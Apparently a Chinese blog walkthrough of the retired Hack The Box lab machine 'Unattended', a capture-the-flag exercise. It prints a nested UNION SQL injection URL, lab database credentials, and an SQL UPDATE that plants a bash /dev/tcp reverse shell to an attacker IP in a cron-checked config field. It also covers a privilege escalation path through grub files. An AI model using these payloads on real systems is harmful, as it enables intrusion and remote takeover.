HTB-靶机-Unattended

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.126

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.126 -o ./Unattended-autorecon

就开放了两个端口,有HTTPS,看到里面有域名,绑定一下hosts访问一把

echo "10.10.10.126 www.nestedflanders.htb" >> /etc/hosts

显示一个Debian的默认页面,看下目录爆破结果存在一个dev目录和index.php文件

gobuster dir -t 50 -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -u https://www.nestedflanders.htb/ -k

gobuster dir -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://www.nestedflanders.htb/ -k

这里存在目录穿越具体可参考:https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md

通过目录穿越读取到目标靶机文件代码index.php

通过分析此代码文件,确认存在SQL注入漏洞,可通过嵌套union查询进行注入

https://www.nestedflanders.htb/index.php?id=25' union select "main' union select '/etc/passwd' LIMIT 1,1;-- -" LIMIT 1,1;-- -

经过测试可以通过使用burpsuite更改user-agent的请求头信息进行注入代码反弹shell

上述需要注意下就是反弹端口只能是80和443,因为目标靶机防火墙过滤了向外连接的端口,只允许外联80和443端口,拿到反弹shell之后根据上面读取的文件index.php知道了数据库名称,用户名和密码,登录进去查看到如下信息

mysql -u nestedflanders -p1036913cf7d38d4ea4f79b050f171e9fbf3f5e -D neddy
select * from config;

测试发现字段checkrelease的属性值存在计划任务周期执行检查,我们可以通过修改此信息横向移动到用户guly

update config set option_value = 'bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"' where option_name = 'checkrelease';

这里提权是分析grab相关信息,分析出来之后得出了root密码,下面是 查找grub相关组信息

find / -group grub -ls 2>/dev/null

通过nc将相关文件传输到本地kali分析出来密码为

132f93ab100671dcb263acaf5dc95d8260e8b7c6

具体分析可参考:

https://0xdf.gitlab.io/2019/08/24/htb-unattended.html
https://overflow.uaacyber.dev/2019/08/unattended.html
https://0xrick.github.io/hack-the-box/unattended/
https://alamot.github.io/unattended_writeup/

posted @   皇帽讲绿帽带法技巧  阅读(231)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示
AI FOR CODE 大赛